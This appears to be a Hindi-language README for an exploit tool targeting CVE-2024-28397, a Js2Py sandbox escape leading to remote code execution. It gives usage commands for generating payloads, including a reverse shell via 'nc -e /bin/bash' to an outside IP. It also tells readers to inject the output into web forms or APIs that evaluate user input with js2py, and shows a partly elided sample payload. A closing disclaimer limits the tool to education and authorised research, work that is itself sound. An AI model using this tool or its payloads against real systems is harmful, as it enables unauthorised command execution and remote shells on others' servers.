
CVE-2024-28397 के लिए पेशेवर एक्सप्लॉइट: Js2Py सैंडबॉक्स एस्केप जो रिमोट कोड निष्पादन (RCE) की ओर ले जाता है। मॉड्यूलर पेलोड जनरेशन शामिल है।
💡 गहन अध्ययन: पूर्ण तकनीकी ब्रीफिंग (PDF) पढ़ने के लिए यहाँ क्लिक करें।
CVE-2024-28397 के लिए एक पेशेवर पेलोड जनरेटर। यह टूल दुर्भावनापूर्ण JavaScript कोड उत्पन्न करता है जो js2py सैंडबॉक्स (संस्करण <= 0.74) से बाहर निकलकर लक्षित सिस्टम पर मनमाने कमांड निष्पादित करने के लिए डिज़ाइन किया गया है।
Js2Py <= 0.74subprocess.Popen क्लास तक पहुँचने के लिए Object.getOwnPropertyNames का शोषण करता है।यह स्क्रिप्ट भेद्यता का शोषण करने के लिए आवश्यक सटीक JavaScript पेलोड उत्पन्न करती है। इस टूल का उपयोग करने के लिए आपको js2py स्थापित करने की आवश्यकता नहीं है।
पीड़ित मशीन पर निष्पादित किए जाने वाले कमांड के साथ स्क्रिप्ट चलाएँ।
# Generate payload to run 'id'
python3 exploit.py -c "id"
# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
टूल द्वारा उत्पन्न आउटपुट को कॉपी करें और इसे असुरक्षित एप्लिकेशन (जैसे, एक वेब फॉर्म, API एंडपॉइंट, या कॉन्फ़िगरेशन फ़ाइल जिसे js2py द्वारा पार्स किया जाता है) में इंजेक्ट करें।
इंजेक्शन उदाहरण:
यदि कोई वेबसाइट उपयोगकर्ता इनपुट लेती है और उसे js2py.eval_js(user_input) के साथ चलाती है, तो उत्पन्न कोड को पेस्ट करने से आपका कमांड उनके सर्वर पर निष्पादित हो जाएगा।
$ python3 exploit.py -c "whoami"
var output = "Initial";
try {
var leaked_wrapper = Object.getOwnPropertyNames({});
// ... (full malicious code) ...
var res = Popen("whoami", ...).communicate();
output = res;
} ...
output
अली सुनबुल (xeloxa)
यह सॉफ्टवेयर केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। लेखक इस कोड के किसी भी दुरुपयोग के लिए कोई ज़िम्मेदारी स्वीकार नहीं करता है। किसी भी ऐसे सिस्टम पर परीक्षण करने से पहले जिसके स्वामी आप नहीं हैं, सुनिश्चित करें कि आपके पास स्पष्ट अनुमति है।